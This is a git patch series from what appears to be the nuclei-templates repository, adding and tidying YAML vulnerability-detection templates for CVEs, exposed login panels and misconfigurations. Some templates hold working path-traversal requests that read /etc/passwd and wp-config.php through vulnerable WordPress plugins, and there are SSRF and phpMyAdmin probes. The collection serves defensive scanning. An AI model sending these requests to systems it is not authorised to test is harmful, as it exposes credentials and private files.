794dfb0bbed4c671f94340ecf32f8a1e60a34066 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 15 Oct 2021 04:01:39 -0300 Subject: [PATCH 2945/4083] Update CVE-2019-6340.yaml Solves cases when the source code contains only uid= and gid= (e.g. https://account.mail.ru) ``nuclei -debug -t ~/nuclei-templates/cves/2019/CVE-2019-6340.yaml -u https://account.mail.ru`` --- cves/2019/CVE-2019-6340.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-6340.yaml b/cves/2019/CVE-2019-6340.yaml index d2b3c1a887..c7691882b1 100644 --- a/cves/2019/CVE-2019-6340.yaml +++ b/cves/2019/CVE-2019-6340.yaml @@ -38,8 +38,9 @@ requests: words: - "uid=" - "gid=" + - "groups=" condition: and part: body - type: status status: - - 200 \ No newline at end of file + - 200 From 087dcb2560ebdb5ee883ad63a53a96a39445ec9f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 15 Oct 2021 07:02:02 +0000 Subject: [PATCH 2946/4083] Auto README Update [Fri Oct 15 07:02:02 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 9ceb478e5d..30671a0e64 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | -| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | -| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | -| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -**171 directories, 2333 files**. +**175 directories, 2366 files**. From 0d98ff0dd4672bd01ed25b6517b1204850c9c284 Mon Sep 17 00:00:00 2001 From: Arman Sameer <65326024+asurti6783@users.noreply.github.com> Date: Fri, 15 Oct 2021 12:05:51 -0400 Subject: [PATCH 2947/4083] Create jira-unauthenticated-screens.yaml --- .../jira/jira-unauthenticated-screens.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/jira/jira-unauthenticated-screens.yaml diff --git a/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/vulnerabilities/jira/jira-unauthenticated-screens.yaml new file mode 100644 index 0000000000..9d8feb2a34 --- /dev/null +++ b/vulnerabilities/jira/jira-unauthenticated-screens.yaml @@ -0,0 +1,32 @@ +id: jira-unauthenticated-screens + +info: + name: Jira Unauthenticated Access to screens + reference: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get + author: TESS + severity: info + tags: atlassian,jira + +requests: + - method: GET + path: + - "{{BaseURL}}/rest/api/api/2/screens" + + matchers-condition: and + matchers: + - type: word + words: + - 'id' + - 'name' + - 'description' + - 'self' + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "atlassian.xsrf.token" From 7bbfd6f87bb7df9a23d855a53fe4ea2e8a9c7050 Mon Sep 17 00:00:00 2001 From: Cristi Vlad Date: Fri, 15 Oct 2021 21:29:59 +0300 Subject: [PATCH 2948/4083] Added PhpMyAdmin Server Import Misconfiguration Template --- pma-server-import.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 pma-server-import.yaml diff --git a/pma-server-import.yaml b/pma-server-import.yaml new file mode 100644 index 0000000000..c6b560c8bd --- /dev/null +++ b/pma-server-import.yaml @@ -0,0 +1,32 @@ +id: pma-server-import + +info: + name: PhpMyAdmin Server Import + author: Cristi vlad (@cristivlad25) + severity: high + description: Finds Unauthenticated PhpMyAdmin Server Import Pages. + references: none + +requests: + - method: GET + path: + - "{{BaseURL}}/pma/server_import.php" + - "{{BaseURL}}/phpmyadmin/server_import.php" + - "{{BaseURL}}/phpMyAdmin 2/server_import.php" + - "{{BaseURL}}/db/server_import.php" + - "{{BaseURL}}server_import.php" + - "{{BaseURL}}/PMA/server_import.php" + - "{{BaseURL}}/admin/server_import.php" + - "{{BaseURL}}/admin/pma/server_import.php" + - "{{BaseURL}}/phpMyAdmin/server_import.php" + - "{{BaseURL}}/admin/phpMyAdmin/server_import.php" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "File to import" + - "Location of the text file" + - type: status + status: + - 200 \ No newline at end of file From 62a8ccd433f378288e92684cf0e7d57560f94b86 Mon Sep 17 00:00:00 2001 From: Cristi Date: Fri, 15 Oct 2021 22:35:33 +0300 Subject: [PATCH 2949/4083] Update pma-server-import.yaml --- pma-server-import.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/pma-server-import.yaml b/pma-server-import.yaml index c6b560c8bd..3597a62c1e 100644 --- a/pma-server-import.yaml +++ b/pma-server-import.yaml @@ -5,7 +5,6 @@ info: author: Cristi vlad (@cristivlad25) severity: high description: Finds Unauthenticated PhpMyAdmin Server Import Pages. - references: none requests: - method: GET @@ -29,4 +28,4 @@ requests: - "Location of the text file" - type: status status: - - 200 \ No newline at end of file + - 200 From dd106dcb8f42d4a5ac8457cfa0ce4b72a41ef466 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 16 Oct 2021 01:06:37 +0530 Subject: [PATCH 2950/4083] misc update and moving files around --- misconfiguration/{ => phpmyadmin}/phpmyadmin-setup.yaml | 0 .../{ => phpmyadmin}/phpmyadmin-sql.php-server.yaml | 0 .../phpmyadmin/pma-server-import.yaml | 5 ++++- 3 files changed, 4 insertions(+), 1 deletion(-) rename misconfiguration/{ => phpmyadmin}/phpmyadmin-setup.yaml (100%) rename misconfiguration/{ => phpmyadmin}/phpmyadmin-sql.php-server.yaml (100%) rename pma-server-import.yaml => misconfiguration/phpmyadmin/pma-server-import.yaml (92%) diff --git a/misconfiguration/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml similarity index 100% rename from misconfiguration/phpmyadmin-setup.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml diff --git a/misconfiguration/phpmyadmin-sql.php-server.yaml b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml similarity index 100% rename from misconfiguration/phpmyadmin-sql.php-server.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml diff --git a/pma-server-import.yaml b/misconfiguration/phpmyadmin/pma-server-import.yaml similarity index 92% rename from pma-server-import.yaml rename to misconfiguration/phpmyadmin/pma-server-import.yaml index c6b560c8bd..881f496d8f 100644 --- a/pma-server-import.yaml +++ b/misconfiguration/phpmyadmin/pma-server-import.yaml @@ -5,7 +5,7 @@ info: author: Cristi vlad (@cristivlad25) severity: high description: Finds Unauthenticated PhpMyAdmin Server Import Pages. - references: none + tags: phpmyadmin,misconfig requests: - method: GET @@ -20,13 +20,16 @@ requests: - "{{BaseURL}}/admin/pma/server_import.php" - "{{BaseURL}}/phpMyAdmin/server_import.php" - "{{BaseURL}}/admin/phpMyAdmin/server_import.php" + stop-at-first-match: true matchers-condition: and matchers: - type: word + condition: and words: - "File to import" - "Location of the text file" + - type: status status: - 200 \ No newline at end of file From 196cc292b81a0fa1f5fb9eb956eed9f29430b04c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 16 Oct 2021 01:09:19 +0530 Subject: [PATCH 2951/4083] adding tags --- misconfiguration/phpmyadmin/pma-server-import.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/misconfiguration/phpmyadmin/pma-server-import.yaml b/misconfiguration/phpmyadmin/pma-server-import.yaml index 3597a62c1e..f6aab37040 100644 --- a/misconfiguration/phpmyadmin/pma-server-import.yaml +++ b/misconfiguration/phpmyadmin/pma-server-import.yaml @@ -5,6 +5,7 @@ info: author: Cristi vlad (@cristivlad25) severity: high description: Finds Unauthenticated PhpMyAdmin Server Import Pages. + tags: phpmyadmin,misconfig requests: - method: GET @@ -19,13 +20,16 @@ requests: - "{{BaseURL}}/admin/pma/server_import.php" - "{{BaseURL}}/phpMyAdmin/server_import.php" - "{{BaseURL}}/admin/phpMyAdmin/server_import.php" + stop-at-first-match: true matchers-condition: and matchers: - type: word + condition: and words: - "File to import" - "Location of the text file" + - type: status status: - 200 From acda6fdb53531a4478ffe1510f8ebe7cf82743bf Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 16 Oct 2021 01:10:48 +0530 Subject: [PATCH 2952/4083] added missing slash --- misconfiguration/phpmyadmin/pma-server-import.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/phpmyadmin/pma-server-import.yaml b/misconfiguration/phpmyadmin/pma-server-import.yaml index f6aab37040..8f8c9c25a8 100644 --- a/misconfiguration/phpmyadmin/pma-server-import.yaml +++ b/misconfiguration/phpmyadmin/pma-server-import.yaml @@ -14,7 +14,7 @@ requests: - "{{BaseURL}}/phpmyadmin/server_import.php" - "{{BaseURL}}/phpMyAdmin 2/server_import.php" - "{{BaseURL}}/db/server_import.php" - - "{{BaseURL}}server_import.php" + - "{{BaseURL}}/server_import.php" - "{{BaseURL}}/PMA/server_import.php" - "{{BaseURL}}/admin/server_import.php" - "{{BaseURL}}/admin/pma/server_import.php" From 2871cc6b0206ac76193d6cabdf5e9b7fcb016dd7 Mon Sep 17 00:00:00 2001 From: lethargynavigator <1496294+lethargynavigator@users.noreply.github.com> Date: Fri, 15 Oct 2021 20:37:03 -0400 Subject: [PATCH 2953/4083] CVE-2020-24589 template --- cves/2020/CVE-2020-24589.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2020/CVE-2020-24589.yaml diff --git a/cves/2020/CVE-2020-24589.yaml b/cves/2020/CVE-2020-24589.yaml new file mode 100644 index 0000000000..8d612f1020 --- /dev/null +++ b/cves/2020/CVE-2020-24589.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-24589 + +info: + name: WSO2 API Manager Blind XXE + author: lethargynavigator + description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XXE. + reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 + severity: critical + tags: cve,cve2020,wso2,api-manager,xxe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.1 + cve-id: CVE-2020-24589 + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/generic/save_artifact_ajaxprocessor.jsp" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + part: body + words: + - "Failed to install the generic artifact type" From e5a4764232a6d1cd7e7427651621d9b1a0ad6352 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 16 Oct 2021 11:23:57 +0530 Subject: [PATCH 2954/4083] workflow update --- .github/workflows/templates-stats.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 669b665655..22f43e7261 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,6 +1,9 @@ name: 🗒 Templates Stats on: + create: + tags: + - v* workflow_dispatch: jobs: From 718f49c6678725fab82d741040e75655a84cd6bb Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 16 Oct 2021 18:44:32 +0900 Subject: [PATCH 2955/4083] Create CVE-2015-4694.yaml --- CVE-2015-4694.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 CVE-2015-4694.yaml diff --git a/CVE-2015-4694.yaml b/CVE-2015-4694.yaml new file mode 100644 index 0000000000..e17313f7e9 --- /dev/null +++ b/CVE-2015-4694.yaml @@ -0,0 +1,24 @@ +id: CVE-2015-4694 + +info: + name: Zip Attachments <= 1.1.4 - Arbitrary File Download + author: 0x_Akoko + severity: high + tags: lfi,wordpress,wp,cve + reference: https://wpscan.com/vulnerability/8047 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 4c191880e9ebe47f50f35a22f56a20663af4ae58 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 16 Oct 2021 18:46:52 +0900 Subject: [PATCH 2956/4083] Create wp-aspose-cloud-ebook-plugin-file-download.yaml --- ...pose-cloud-ebook-plugin-file-download.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-aspose-cloud-ebook-plugin-file-download.yaml diff --git a/wp-aspose-cloud-ebook-plugin-file-download.yaml b/wp-aspose-cloud-ebook-plugin-file-download.yaml new file mode 100644 index 0000000000..c0f5546c13 --- /dev/null +++ b/wp-aspose-cloud-ebook-plugin-file-download.yaml @@ -0,0 +1,26 @@ +id: wp-aspose-cloud-ebook-plugin-file-download + +info: + name: Aspose Cloud eBook Generator - File Download + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi,wp + reference: https://wpscan.com/vulnerability/7866 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 274f3f941ab048e39c32acdae71cce90b5b82c54 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 16 Oct 2021 17:19:30 -0300 Subject: [PATCH 2957/4083] Update microstrategy-ssrf.yaml --- vulnerabilities/other/microstrategy-ssrf.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml index c6a6969e69..72c0f5ee6c 100644 --- a/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/vulnerabilities/other/microstrategy-ssrf.yaml @@ -13,7 +13,8 @@ requests: path: - '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - + + stop-at-first-match: true matchers: - type: word words: From 5385191a9d5a42fcaf610210cff17797810fe4fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 07:46:32 +0530 Subject: [PATCH 2958/4083] Update microstrategy-ssrf.yaml --- vulnerabilities/other/microstrategy-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml index 72c0f5ee6c..adfda438b6 100644 --- a/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/vulnerabilities/other/microstrategy-ssrf.yaml @@ -13,7 +13,7 @@ requests: path: - '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - + stop-at-first-match: true matchers: - type: word From ef16ad713bacefe9c398fcab7d0a51b147a1dea1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 07:49:46 +0530 Subject: [PATCH 2959/4083] Update and rename wp-aspose-cloud-ebook-plugin-file-download.yaml to vulnerabilities/wordpress/aspose-file-download.yaml --- .../wordpress/aspose-file-download.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename wp-aspose-cloud-ebook-plugin-file-download.yaml => vulnerabilities/wordpress/aspose-file-download.yaml (75%) diff --git a/wp-aspose-cloud-ebook-plugin-file-download.yaml b/vulnerabilities/wordpress/aspose-file-download.yaml similarity index 75% rename from wp-aspose-cloud-ebook-plugin-file-download.yaml rename to vulnerabilities/wordpress/aspose-file-download.yaml index c0f5546c13..78d4048c1b 100644 --- a/wp-aspose-cloud-ebook-plugin-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-file-download.yaml @@ -1,11 +1,12 @@ -id: wp-aspose-cloud-ebook-plugin-file-download +id: aspose-file-download info: name: Aspose Cloud eBook Generator - File Download author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi,wp + description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. reference: https://wpscan.com/vulnerability/7866 + tags: wordpress,wp-plugin,lfi requests: - method: GET From dc22f77a5027f44a4cbc0a83e650b5297cf63ebb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 17 Oct 2021 02:21:14 +0000 Subject: [PATCH 2960/4083] Auto Generated CVE annotations [Sun Oct 17 02:21:14 UTC 2021] :robot: --- cves/2021/CVE-2021-40978.yaml | 5 +++++ cves/2021/CVE-2021-42013.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml index 2273074039..81ec5d959e 100644 --- a/cves/2021/CVE-2021-40978.yaml +++ b/cves/2021/CVE-2021-40978.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 tags: cve,cve2021,mkdocs,lfi description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-40978 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml index 9537c2fa6b..e789a8f86e 100644 --- a/cves/2021/CVE-2021-42013.yaml +++ b/cves/2021/CVE-2021-42013.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - https://twitter.com/itsecurityco/status/1446136957117943815 tags: cve,cve2021,lfi,apache,rce,misconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-42013 + cwe-id: CWE-22 requests: - raw: From d461c1f77cc764ebcfee7637a7bf1b518f73bf10 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 08:01:28 +0530 Subject: [PATCH 2961/4083] Update and rename CVE-2015-4694.yaml to cves/2015/CVE-2015-4694.yaml --- CVE-2015-4694.yaml => cves/2015/CVE-2015-4694.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) rename CVE-2015-4694.yaml => cves/2015/CVE-2015-4694.yaml (72%) diff --git a/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml similarity index 72% rename from CVE-2015-4694.yaml rename to cves/2015/CVE-2015-4694.yaml index e17313f7e9..6b81b9705d 100644 --- a/CVE-2015-4694.yaml +++ b/cves/2015/CVE-2015-4694.yaml @@ -4,8 +4,9 @@ info: name: Zip Attachments <= 1.1.4 - Arbitrary File Download author: 0x_Akoko severity: high - tags: lfi,wordpress,wp,cve + description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. reference: https://wpscan.com/vulnerability/8047 + tags: lfi,wordpress,cve,cve2015,wp-plugin requests: - method: GET From 39ab764bfa0618b4f87458f4ecf9ee473de65c80 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 08:03:02 +0530 Subject: [PATCH 2962/4083] Update CVE-2015-4694.yaml --- cves/2015/CVE-2015-4694.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml index 6b81b9705d..c273f16a80 100644 --- a/cves/2015/CVE-2015-4694.yaml +++ b/cves/2015/CVE-2015-4694.yaml @@ -4,7 +4,7 @@ info: name: Zip Attachments <= 1.1.4 - Arbitrary File Download author: 0x_Akoko severity: high - description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. + description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. reference: https://wpscan.com/vulnerability/8047 tags: lfi,wordpress,cve,cve2015,wp-plugin From ba3c7afed0da04a6f361da01ac9b0ed9201237b2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 08:36:48 +0530 Subject: [PATCH 2963/4083] Update jira-unauthenticated-screens.yaml --- .../jira/jira-unauthenticated-screens.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/vulnerabilities/jira/jira-unauthenticated-screens.yaml index 9d8feb2a34..7055da97cb 100644 --- a/vulnerabilities/jira/jira-unauthenticated-screens.yaml +++ b/vulnerabilities/jira/jira-unauthenticated-screens.yaml @@ -2,24 +2,24 @@ id: jira-unauthenticated-screens info: name: Jira Unauthenticated Access to screens - reference: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get author: TESS severity: info + reference: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get tags: atlassian,jira requests: - method: GET path: - - "{{BaseURL}}/rest/api/api/2/screens" + - "{{BaseURL}}/rest/api/2/screens" + max-size: 1000 matchers-condition: and matchers: - type: word words: - - 'id' - - 'name' - - 'description' - - 'self' + - '"id":' + - '"name":' + - '"description":' condition: and - type: status From d83f6ef0a47a2b9c46f0c2e5ab4ce27da6b35f8c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 17 Oct 2021 13:46:35 +0530 Subject: [PATCH 2964/4083] misc update --- technologies/shiro-detect.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml index 8353c48494..9ce943e7bf 100644 --- a/technologies/shiro-detect.yaml +++ b/technologies/shiro-detect.yaml @@ -11,10 +11,12 @@ requests: path: - '{{BaseURL}}' headers: - Cookie: rememberMe=123; + Cookie: JSESSIONID={{randstr}};rememberMe=123; + redirects: true + max-redirects: 2 matchers: - type: word + part: header words: - - 'rememberMe=deleteMe' - part: header \ No newline at end of file + - "rememberMe=deleteMe" \ No newline at end of file From 6b367a4211466108bb49d438100bff74b91926b2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 16:09:16 +0530 Subject: [PATCH 2965/4083] Create open-game-panel.yaml --- exposed-panels/open-game-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/open-game-panel.yaml diff --git a/exposed-panels/open-game-panel.yaml b/exposed-panels/open-game-panel.yaml new file mode 100644 index 0000000000..e0c6558d7c --- /dev/null +++ b/exposed-panels/open-game-panel.yaml @@ -0,0 +1,25 @@ +id: open-game-panel + +info: + name: Open Game Panel + author: dhiyaneshDk + severity: info + tags: panel + metadata: + shodan: 'http.title:"Open Game Panel"' + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Open Game Panel" + + - type: status + status: + - 200 From 1dc7debf72e268ffabeac0a3260b9b2e8079edaa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 16:09:46 +0530 Subject: [PATCH 2966/4083] Update open-game-panel.yaml --- exposed-panels/open-game-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/open-game-panel.yaml b/exposed-panels/open-game-panel.yaml index e0c6558d7c..8b75e5b1a6 100644 --- a/exposed-panels/open-game-panel.yaml +++ b/exposed-panels/open-game-panel.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk severity: info tags: panel + reference: https://www.exploit-db.com/ghdb/7418 metadata: shodan: 'http.title:"Open Game Panel"' From 71e18db10e258c9a3317bb95f575972c868b3f90 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 16:13:31 +0530 Subject: [PATCH 2967/4083] Create project-insight-login.yaml --- exposed-panels/project-insight-login.yaml | 26 +++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/project-insight-login.yaml diff --git a/exposed-panels/project-insight-login.yaml b/exposed-panels/project-insight-login.yaml new file mode 100644 index 0000000000..4f171ac7a5 --- /dev/null +++ b/exposed-panels/project-insight-login.yaml @@ -0,0 +1,26 @@ +id: project-insight-login + +info: + name: Project Insight - Login + author: dhiyaneshDk + severity: info + tags: panel + reference: https://www.exploit-db.com/ghdb/7413 + metadata: + shodan: 'http.title:"Project Insight - Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Project Insight - Login" + + - type: status + status: + - 200 From 4798bb9729aecc5e85608c8554099f5cd34f066e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 16:16:54 +0530 Subject: [PATCH 2968/4083] Create squirrelmail-login.yaml --- exposed-panels/squirrelmail-login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/squirrelmail-login.yaml diff --git a/exposed-panels/squirrelmail-login.yaml b/exposed-panels/squirrelmail-login.yaml new file mode 100644 index 0000000000..2833af3cee --- /dev/null +++ b/exposed-panels/squirrelmail-login.yaml @@ -0,0 +1,26 @@ +id: squirrelmail-login + +info: + name: SquirrelMail - Login + author: dhiyaneshDk + severity: info + tags: panel + reference: https://www.exploit-db.com/ghdb/7407 + metadata: + shodan: 'http.title:"SquirrelMail - Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}/src/login.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SquirrelMail - Login" + + - type: status + status: + - 200 From a93d038c42f5832abb1c1c3b9e164cda3c366f17 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 16:20:33 +0530 Subject: [PATCH 2969/4083] Create zimbra-web-client.yaml --- exposed-panels/zimbra-web-client.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/zimbra-web-client.yaml diff --git a/exposed-panels/zimbra-web-client.yaml b/exposed-panels/zimbra-web-client.yaml new file mode 100644 index 0000000000..be640f3516 --- /dev/null +++ b/exposed-panels/zimbra-web-client.yaml @@ -0,0 +1,26 @@ +id: zimbra-web-client + +info: + name: Zimbra Web Client Sign In + author: dhiyaneshDk + severity: info + tags: panel + reference: https://www.exploit-db.com/ghdb/7409 + metadata: + shodan: 'http.title:"Zimbra Web Client Sign In"' + +requests: + - method: GET + path: + - "{{BaseURL}}/zimbraAdmin/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Zimbra Administration" + + - type: status + status: + - 200 From 3297c73688253be1d97c8bf865b25d87452235fc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 17 Oct 2021 16:24:15 +0530 Subject: [PATCH 2970/4083] Create dericam-login.yaml --- exposed-panels/dericam-login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/dericam-login.yaml diff --git a/exposed-panels/dericam-login.yaml b/exposed-panels/dericam-login.yaml new file mode 100644 index 0000000000..eeb190eeec --- /dev/null +++ b/exposed-panels/dericam-login.yaml @@ -0,0 +1,26 @@ +id: dericam-login + +info: + name: Dericam Login + author: dhiyaneshDk + severity: info + tags: panel + reference: https://www.exploit-db.com/ghdb/7354 + metadata: + shodan: 'http.title:"Dericam"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Dericam" + + - type: status + status: + - 200 From fffa8480c08a8b3a31206c890e4ae1fd5191488d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 17 Oct 2021 16:35:01 +0530 Subject: [PATCH 2971/4083] Update dericam-login.yaml --- exposed-panels/dericam-login.yaml | 2 +- 1 file 